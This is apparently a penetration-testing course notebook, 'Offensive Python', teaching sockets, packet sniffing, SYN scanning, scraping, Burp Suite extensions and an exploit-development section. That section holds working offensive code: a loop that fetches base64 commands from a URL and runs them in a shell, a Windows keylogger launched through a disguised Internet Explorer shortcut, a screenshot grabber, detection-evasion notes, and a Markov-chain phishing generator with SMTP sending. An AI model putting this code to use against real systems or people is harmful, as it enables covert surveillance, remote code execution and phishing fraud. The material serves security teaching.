# Offensive Python: Custom scripts for penetration testing

## https://whitehat.academy

## Motivation

### Why custom scripts?
- Working on systems without services installed
- Working around a firewall/security system
- Crafting custom tools
- More fully understanding how systems and tools work

### Why Python?
- Free
- Commonly found + easy to install
- Flexible and extensible
- Many existing modules
- Large community

## OS basics

In [ ]:
import os

print(os.environ)

print(os.getcwd())

os.listdir(".")

In [ ]:
# Directory walking

import os

keys_dir = os.path.expanduser('~/.ssh/')
if os.path.isdir(keys_dir):
    for folder, subfolders, files in os.walk(keys_dir):
        print('Directory: %s' % folder)
        for fname in files:
            print('\tFile: %s' % fname)

In [ ]:
# Running shell commands
import subprocess

# v1: pass a list, starting with the command to run followed by args
print(subprocess.check_output(['ls', '-a']))

# v2: use threads and Popen for more customization (partial example)
proc = subprocess.Popen('pwd', stdout=subprocess.PIPE)
proc.wait()
for line in proc.stdout:
    print(line)

# v3: pass shellcode directly to the default shell
print(subprocess.check_output("ls -a | wc -l", shell=True))

In [ ]:
# Also available in Jupyter notebooks directly
!pwd

In [ ]:
%%ruby

# Run other languages directly in notebook
puts "hello ruby"

In [ ]:
# Other magic available
%lsmagic

## Creating clients and servers

### Basic sockets

In [ ]:
# Simple HTTP server
! python -m SimpleHTTPServer

In [ ]:
# TCP/IP client for raw HTTP traffic

import socket

target = ("example.com", 80)

request = """
GET / HTTP/1.1
Host: example.com

""" # note the extra empty line above to designate the end of the headers

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# for UDP, would use socket.SOCK_DGRAM and sendto() / recvfrom() without establishing a connection

client.settimeout(5)

client.connect(target)
client.send(request)

response = client.recv(1024)
print(response)

In [ ]:
# TCP server

import socket
import threading

target = ('localhost', 9001)
max_connections = 5

# Create a TCP/IP socket, bind to the target, and listen for up to max_connections
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allow port reuse if connection hangs
sock.bind(target)
sock.listen(max_connections)

def handle_client(client):
    while True:
        data = client.recv(16) # Receive 16 bytes at a time
        if data:
            print('Received "%s"' % data)
        else:
            break
        client.sendall("senpai noticed you")
    client.close()
    print "Closed connection."

while True:
    client, addr = sock.accept()
    print("Accepted connection from %s on port %s" % addr)
    client_handler = threading.Thread(target=handle_client, args=(client,))
    client_handler.start()

In [ ]:
# TCP client (needs to be run in a separate process from the server above)

import socket

# Connect the socket to the port where the server is listening
server_address = ('localhost', 9001)
sock = socket.create_connection(server_address)

message = 'Hello server. Please acknowledge me.'

try:
    print('Sending "%s"' % message)
    sock.sendall(message)
    while True:
        data = sock.recv(1024)
        if data:
            print('Received "%s"' % data)
        else:
            break
finally:
    sock.close()

### SSH server + client

#### Paramiko demo SSH server:
Visit https://github.com/paramiko/paramiko/tree/master/demos for the following files:
- `demo_server.py`
- `test_rsa.key` RSA demo private key
- `demo.py` client
- `interactive.py` for interactive shell, in same folder as `demo.py`

username: `robey`, password: `foo`

Point `demo_server.py` at the `test_rsa.key` file and set `DoGSSAPIKeyExchange` to be `False`

In [ ]:
# Generating custom server keys
! openssl genrsa -des3 -out ssh_private.pem 2048
! openssl rsa -in ssh_private.pem -outform PEM -pubout -out ssh_public.pem

### FTP server

In [ ]:
# Uses twistd, Twisted daemon (need to `pip install twisted` first)
# `-n` flag runs Twisted synchronously in the foreground instead of as a background daemon

! twistd -n ftp

### Anonymous FTP client access

In [ ]:
import ftplib

for host in ['ftp.ubuntu.com', 'ftp.debian.org', 'ftp.apple.com']:
    try:
        ftp = ftplib.FTP(host)
        ftp.login() # no credentials passed
        print('Succeeded at ' + str(host))
        print(ftp.retrlines('LIST'))
        ftp.quit()
    except Exception, e:
        print('Failed at ' + str(host))

### SSH/DNS traffic tunnels: sshuttle

https://github.com/apenwarr/sshuttle

Video demo using Amazon EC2 for SSH tunneling: https://youtu.be/dl2FsIfHo84

## Capturing network packets

### Scenarios:
- Open wifi sniffing
- Man-in-the-middle attacks
- Data exfiltration
- Custom honeypot
- Network debugging

#### Installing scapy (easiest to use in a Kali Linux VM):

```pip install scapy```

```pip install pcapy```

On MacOS: ```brew install pcap```

Then in a Python shell, try:
    ```from scapy.all import *```

If that import says it can't find "dumbnet", install `libdnet` with the following:


```git clone https://github.com/dugsong/libdnet.git
cd libdnet
./configure && make
cd python
python setup.py install```

In [ ]:
# Sniff the next available packet

from scapy.all import sniff

sniff(prn=lambda(p): p.show(), count=1)

In [ ]:
# Sniff any ICMP traffic to/from Google Public DNS over the next 10 seconds

from scapy.all import sniff

pings = sniff(filter="icmp and host 8.8.8.8", timeout=10)
pings.summary()

## Custom packet crafting and port scanning 

In [ ]:
# Ping a site and receive a single response

from scapy.all import sr1, IP, ICMP

ping_req = IP(dst="example.com")/ICMP()/"ABC123ABC123"
reply = sr1(ping_req)

# Display the results in various formats
print(reply.show())
print(reply.summary())
print(reply)
reply

In [ ]:
# Send SYN-ACK packet to Google and display replies

from scapy.all import IP, TCP, sr1

syn_ack = IP(dst="72.14.207.99")/TCP(dport=80, flags="SA")
reply = sr1(syn_ack, timeout=3)

reply.summary()

### Simple TCP SYN Scanner (or Flooder...)

In [ ]:
# Summarize responses to SYN packets from specific ports

from scapy.all import IP, TCP, sr

packet = IP(dst="example.com")/TCP(dport=[21,25,80,443], flags="S")
ans, unans = sr(packet, timeout=5)
ans.summary(lambda(req, reply): reply.sprintf("Port: %TCP.sport% \t Flags: %TCP.flags%"))

In [ ]:
# Create a table of responses across multiple IPs

from scapy.all import IP, TCP, sr

packet = IP(dst=["example.com", "microsoft.com", "dc.gov"])/TCP(dport=[21,25,80,443], flags="S")
a, u = sr(packet, timeout=5)
a.make_table(lambda (s,r): (s.dst, s.dport, "X"))

## Web scraping and browser automation

In [ ]:
# Get a webpage using built-in urllib2

import urllib2

response = urllib2.urlopen("https://example.com")
print(response.read())

In [ ]:
# Get a webpage using requests

import requests

response = requests.get("https://example.com")
print("Status code: {}".format(response.status_code))
print(response.content)

### Scenarios:
- Keep tabs on a website and respond quickly to changes
- Automate bulk/repeated browser actions
- Custom site crawler

In [ ]:
# Grab the current stock price of YHOO

import requests
from bs4 import BeautifulSoup

custom_headers = {
  'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
}

url = "http://finance.yahoo.com/q?s=yhoo"

response = requests.get(url, headers=custom_headers)
soup = BeautifulSoup(response.content)

# Search HTML for unique tags around the price
tags = soup.find_all("span", attrs={'data-reactid': '258'})
price = tags[0].string

print(price)

### Custom scripts to extend existing tools

#### Burp Suite Extender

- Automate manual/complex tasks
- Work with special encoding or unusual data structures (custom serialization)
- Have more granular control of request and response data
- Extend attack logic (e.g. while spidering a site, try a simple attack on all pages matching X)

In [ ]:
# First download and install Jython (Python running on Java): jython.org/downloads.html
# Then point Burp Suite > Extender > Options > Python Environment at the downloaded .jar file

# The following code goes into a separate .py file loaded into Burp Suite > Extender > Extensions

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.setExtensionName("L33t 3xt3ns10n")
        callbacks.issueAlert("Hello alerts tab")

# Once loaded, check Burp Suite's Alerts tab on the far right for output from the extension

#### First, a minor diversion - simple Python server for a login page:

In [ ]:
# The page shows the current user when the correct credentials (admin/p@ssw0rd) are supplied

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from urlparse import parse_qsl
from base64 import b64decode

class SimpleServe(BaseHTTPRequestHandler):
    page = """
      <html><body>
        <form method="POST">
          Username: <input type="text" name="user" required><br />
          Password: <input type="password" name="pwd" required><br />
          <button type="submit">Login</button>
        </form>
        Current logged-in user: <span id="current-user">{}</span>
      </body></html>
    """

    def _respond(self, user):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(self.page.format(user))

    def do_GET(self):
        self._respond("-")

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length'))
        post_data = self.rfile.read(content_length)
        params = dict(parse_qsl(post_data))
        if b64decode(self.headers.get('Authorization', '')) != params.get('user'):
            self._respond("UNAUTHORIZED")
        elif params.get('user') == 'admin' and params.get('pwd') == 'p@ssw0rd':
            self._respond("admin")
        else:
            self._respond("-")

s = HTTPServer(('', 8888), SimpleServe)
s.serve_forever()

#### Burp Suite extension for modifying requests

In [ ]:
# Burp Suite Python extension for client-side signing of requests
# use processProxyMessage to rewrite outbound traffic

from burp import IBurpExtender, IProxyListener
from base64 import b64encode

class BurpExtender(IBurpExtender, IProxyListener):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.registerProxyListener(self)
        callbacks.setExtensionName("Add Custom Auth Header")

    def processProxyMessage(self, is_request, message):
        if not is_request:
            return

        request = message.getMessageInfo()
        request_data = self._helpers.analyzeRequest(request)
        body_raw = request.getRequest()[request_data.getBodyOffset():]
        body = self._helpers.bytesToString(body_raw)

        headers = list(request_data.getHeaders())
        params = list(request_data.getParameters())
        for param in params:
            if param.name == 'user':
                username = str(param.value)
                headers.append("Authorization: " + b64encode(username))
                break

        new_message = self._helpers.buildHttpMessage(headers, body)
        print(self._helpers.bytesToString(new_message))
        request.setRequest(new_message)

## Exploit development

### Execute shell code

In [ ]:
# Create a payload file to be served (locally, in this example)

from base64 import b64encode

# shellcode payload to be base64-encoded
payload = b64encode("""
echo 'hello target'
pwd
""")

# save code as a file
! echo "{payload}" > exploit

# serve the file (needs to be running separate instance from the execution below)
! python -m SimpleHTTPServer

In [ ]:
# Grab shell code from the web and execute it

import urllib2
from base64 import b64decode
import subprocess

response = urllib2.urlopen("http://localhost:8000/exploit")
code = b64decode(response.read())

for line in code.split('\n'):
    print(subprocess.check_output(line, shell=True))

### Keylogging on Windows

In [ ]:
# PyHook for capturing Windows events

# First install pyHook on Windows:
# http://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
# Download pyHook‑1.5.1‑cp27‑cp27m‑win32.whl
# pip install pyHook‑1.5.1‑cp27‑cp27m‑win32.whl

# Also pip install pypiwin32 (for pythoncom module)


###### launch.bat file to replicate Internet Explorer as a shortcut:
@echo off
start "" "c:\script.pyw"
start "" "c:\program files (x86)\internet explorer\iexplore.exe"
######

###### .PYW file to run in the background without console output:
import pyHook
import pythoncom
import logging

log = "C:\\Users\\myname\\log.txt"

def OnKeyboardEvent(event):
    logging.basicConfig(filename=log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10, chr(event.Ascii))
    return True

hooks_manager = pyHook.Hook2Manager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

In [ ]:
# PyWin32 for sceenshots

import win32gui, win32ui, win32con, win32api

hwin = win32gui.GetDesktopWindow()
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
hwindc = win32gui.GetWindowDC(hwin)
srcdc = win32ui.CreateDCFromHandle(hwindc)
memdc = srcdc.CreateCompatibleDC()
bmp = win32ui.CreateBitmap()
bmp.CreateCompatibleBitmap(srcdc, width, height)
memdc.SelectObject(bmp)
memdc.BitBlt((0, 0), (width, height), srcdc, (left, top), win32con.SRCCOPY)
bmp.SaveBitmapFile(memdc, 'C:\\Users\\myname\\Downloads\\screenshot.bmp')


### Evading detection
- Encryption/obfuscation
- Sandbox detection
- PyInstaller
- Custom code
- Hooks and pivots

## Automated phishing

### Scraping and creatively reusing information

Related projects to check out:
- [lyricize](https://github.com/fheisler/lyricize): Markov chains to generate lyrics
- [natural language processing on Gmail messages](http://engineroom.trackmaven.com/blog/monthly-challenge-natural-language-processing/) using [NLTK](http://www.nltk.org/)

In [ ]:
import requests
from bs4 import BeautifulSoup
from pymarkovchain import MarkovChain
import re

target = "https://example.com"
response = requests.get(target)

# Find any email addresses on page
emails = re.findall(r'[\w\.-]+@[\w\.-]+', response.text)
print("Possible addresses found: %s\n" % emails)

# Gather visible text on target page
soup = BeautifulSoup(response.text)
snippets = soup.body.findAll(lambda s: not s.name in ['style', 'script'], text=True)
bag = ' '.join([snip.text.strip() for snip in snippets])

# Generate new text similar to existing page content
mc = MarkovChain()
mc.generateDatabase(bag)

subject = mc.generateString()[:40]
body = mc.generateString()[:300] + '\n' + mc.generateString()[:300]

print("Subject: %s\n" % subject)
print("Body:\n%s" % body)

### Sending SMTP emails

In [ ]:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

sender = "maybe@my.mail"
receiver = "target@example.com"

msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = "test"
body = MIMEText("click my <a href='https://youtu.be/dQw4w9WgXcQ'>link</a> please", 'html')
msg.attach(body)

mail = smtplib.SMTP('smtp.gmail.com', 587)
mail.ehlo()
mail.starttls()
mail.login('my_gmail_username', 'my_password')
mail.sendmail(sender, receiver, msg.as_string())
mail.close()

### Create malicious PDF with embedded JS

Using [make-pdf tools from Didier Stevens](https://blog.didierstevens.com/programs/pdf-tools/)

Download: https://didierstevens.com/files/software/make-pdf_V0_1_6.zip

Place `make-pdf-javascript.py` and `mPDF.py` in your current working directory.

In [ ]:
# Save a payload into a JS file
! echo "app.alert({cMsg: 'Hello PDF', cTitle: 'Testing PDF JavaScript', nIcon: 3});" > payload.js

# Run make-pdf-javascript utility to embed payload into a new PDF file
! python make-pdf-javascript.py -f payload.js demo.pdf

## Other resources

Paid products:
- [Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers](https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579)
- [Black Hat Python](https://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Didier Stevens Labs](http://didierstevenslabs.com/products.html)

Free:
- (PDF) [Writing Basic Security Tools Using Python](http://www.binary-zone.com/course/HTID/Python4Infosec.pdf)
- [Twisted example scripts](http://twistedmatrix.com/documents/current/core/examples/)